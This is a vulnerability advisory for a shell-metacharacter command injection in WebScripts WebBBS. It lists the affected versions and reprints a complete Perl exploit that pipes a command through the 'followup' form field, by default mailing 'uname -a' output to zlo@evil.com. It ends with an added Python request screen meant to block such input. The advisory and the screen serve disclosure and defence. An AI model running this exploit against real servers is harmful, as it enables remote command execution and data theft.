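WebScripts WebBBS Remote Command Execution Vulnerability
Published: 2002-06-21
Updated: 2002-06-21
Severity: High
Threat level: Ordinary user access privileges
Error type: Input validation error
Exploitation method: Server mode
BUGTRAQ ID: 5048
Affected systems:
WebScripts WebBBS 4.0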
- Apache Software Foundation Apache 1.3.20
- Apache Software Foundation Apache 1.3.22
- Apache Software Foundation Apache 1.3.23
- Apache Software Foundation Apache 1.3.24
- Apache Software Foundation Apache 1.3.25
WebScripts WebBBS 4.1
- Apache Software Foundation Apache 1.3.20
- Apache Software Foundation Apache 1.3.22
- Apache Software Foundation Apache 1.3.23
- Apache Software Foundation Apache 1.3.24
- Apache Software Foundation Apache 1.3.25
WebScripts WebBBS 4.2
- Apache Software Foundation Apache 1.3.20
- Apache Software Foundation Apache 1.3.22
- Apache Software Foundation Apache 1.3.23
- Apache Software Foundation Apache 1.3.24
- Apache Software Foundation Apache 1.3.25
WebScripts WebBBS 4.10
- Apache Software Foundation Apache 1.3.20
- Apache Software Foundation Apache 1.3.22
- Apache Software Foundation Apache 1.3.23
- Apache Software Foundation Apache 1.3.24
- Apache Software Foundation Apache 1.3.25
WebScripts WebBBS 4.11
- Apache Software Foundation Apache 1.3.20
- Apache Software Foundation Apache 1.3.22
- Apache Software Foundation Apache 1.3.23
- Apache Software Foundation Apache 1.3.24
- Apache Software Foundation Apache 1.3.25
WebScripts WebBBS 4.12
- Apache Software Foundation Apache 1.3.20
- Apache Software Foundation Apache 1.3.22
- Apache Software Foundation Apache 1.3.23
- Apache Software Foundation Apache 1.3.24
- Apache Software Foundation Apache 1.3.25
WebScripts WebBBS 4.20
- Apache Software Foundation Apache 1.3.20
- Apache Software Foundation Apache 1.3.22
- Apache Software Foundation Apache 1.3.23
- Apache Software Foundation Apache 1.3.24
- Apache Software Foundation Apache 1.3.25
WebScripts WebBBS 4.21
- Apache Software Foundation Apache 1.3.20
- Apache Software Foundation Apache 1.3.22
- Apache Software Foundation Apache 1.3.23
- Apache Software Foundation Apache 1.3.24
- Apache Software Foundation Apache 1.3.25
WebScripts WebBBS 4.22
- Apache Software Foundation Apache 1.3.20
- Apache Software Foundation Apache 1.3.22
- Apache Software Foundation Apache 1.3.23
- Apache Software Foundation Apache 1.3.24
- Apache Software Foundation Apache 1.3.25
WebScripts WebBBS 4.30
- Apache Software Foundation Apache 1.3.20
- Apache Software Foundation Apache 1.3.22
- Apache Software Foundation Apache 1.3.23
- Apache Software Foundation Apache 1.3.24
- Apache Software Foundation Apache 1.3.25
WebScripts WebBBS 4.31
- Apache Software Foundation Apache 1.3.20
- Apache Software Foundation Apache 1.3.22
- Apache Software Foundation Apache 1.3.23
- Apache Software Foundation Apache 1.3.24
- Apache Software Foundation Apache 1.3.25
WebScripts WebBBS 4.32
- Apache Software Foundation Apache 1.3.20
- Apache Software Foundation Apache 1.3.22
- Apache Software Foundation Apache 1.3.23
- Apache Software Foundation Apache 1.3.24
- Apache Software Foundation Apache 1.3.25
WebScripts WebBBS 4.33
- Apache Software Foundation Apache 1.3.20
- Apache Software Foundation Apache 1.3.22
- Apache Software Foundation Apache 1.3.23
- Apache Software Foundation Apache 1.3.24
- Apache Software Foundation Apache 1.3.25
WebScripts WebBBS 5.0
- Apache Software Foundation Apache 1.3.20
- Apache Software Foundation Apache 1.3.22
- Apache Software Foundation Apache 1.3.23
- Apache Software Foundation Apache 1.3.24
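- Apache Software Foundation Apache 1.3.25
Detailed description:
WebBBS does not sufficiently filter shell metacharacters in CGI parameters. An attacker can supply special characters to execute arbitrary commands with the privileges of the web server.
Test code:
#!/usr/bin/perl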
#
# nerF gr0up
#
# exploit code for
# WebBBS by Darryl C. Burgdorf
# all version up to 5.00 are vulnerable
#
#
# this is an exploitation of "followup" bug.
# it allows remote attacker to execute shell commands.
# you can find WebBBS script at http://awsd.com/scripts/webbbs/
#
# 06.06.2002
# btr // nerf
# nerf.ru
use IO::Socket;
srand();
$script = "/cgi-bin/webbbs/webbbs_config.pl";
$command = "uname -a|mail zlo@evil.com";
$host = "localhost";
$port = 80;
$content = "$content" . "name=" . rand(254);
$content = "$content" . "&email=" . rand(254);
$content = "$content" . "&subject=" . rand(254);
$content = "$content" . "&body=" . rand(254);
$content="$content"."&followup=".rand(254)."|$command|";
$content_length = length($content);
$content_type = "application/x-www-form-urlencoded";
if (@ARGV[0]) {$command=@ARGV[0];}
if (@ARGV[1]) {$host=@ARGV[1];}
if (@ARGV[2]) {$script=@ARGV[2];}
$buf = "POST " . "$script" . "?post HTTP/1.0\n";
$buf = "$buf" . "Content-Type: $content_type\r\nContent-Length:";
$buf = "$buf" . "$content_length\r\n\r\n$content", 0;
print "\tnerF gr0up\n";
print "exploit: WebBBS (awsd.com), version up to 5.00\n";
print "sent:\n$buf\n";
if($socket = IO::Socket::INET->new("$host:$port")){
print $socket "$buf";
read($socket,$buf,1500);
print "recieved:\n$buf\n";
}
Solution: None
Related information: nerf gr0up nerf <vipersv@mail.ru>.
Reference: http://online.securityfocus.com/archive/1/277517
Related homepage: http://awsd.com/scripts/webbbs/
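
The advisory lists no fix, so a site still running the board has to screen requests itself. The following is an added example, not code from the advisory or from WebBBS: a Python check for form-urlencoded POST bodies that accepts followup only as a numeric message reference and flags shell metacharacters in unrecognised fields. The followup format, the set of free-text fields and the sample bodies are assumptions constructed for illustration.

```python
from urllib.parse import parse_qsl

# Characters a POSIX shell treats specially: pipes, separators, substitution,
# redirection, globbing, quoting and line breaks.
SHELL_META = set("|;&`$<>(){}[]*?!~'\"\\\n\r")

# Assumption: these fields are free text that is only stored and displayed,
# so punctuation in them is legitimate and is not flagged here.
FREE_TEXT = {"name", "email", "subject", "body"}


def followup_ok(value: str) -> bool:
    """Assumption: followup holds message numbers, e.g. "42" or "3,4"."""
    if value == "":
        return True  # assumed to mean a new thread
    return all(part.isascii() and part.isdigit() for part in value.split(","))


def screen_post(body: str) -> list:
    """Return (field, reason) findings for one form-urlencoded POST body."""
    findings = []
    # parse_qsl percent-decodes, so %7C is checked as "|" like a raw pipe.
    for field, value in parse_qsl(body, keep_blank_values=True):
        if field == "followup":
            if not followup_ok(value):
                findings.append((field, "not a numeric message reference"))
        elif field not in FREE_TEXT and SHELL_META & set(value):
            findings.append((field, "shell metacharacter in value"))
    return findings


# Constructed sample bodies (CMD is a placeholder, not a real command).
SAMPLES = [
    "name=alice&email=a%40example.org&subject=Re%3A+hi%21&body=thanks&followup=42",
    "name=x&email=y&subject=z&body=b&followup=12%7CCMD%7C",
    "followup=7&extra=a%3Bb",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        result = screen_post(sample)
        print("REJECT" if result else "ALLOW ", result, sample)
```

A request with any finding should be rejected before it reaches the CGI script; the allowlist on followup is what stops the pipe-delimited value, whether it arrives raw or percent-encoded.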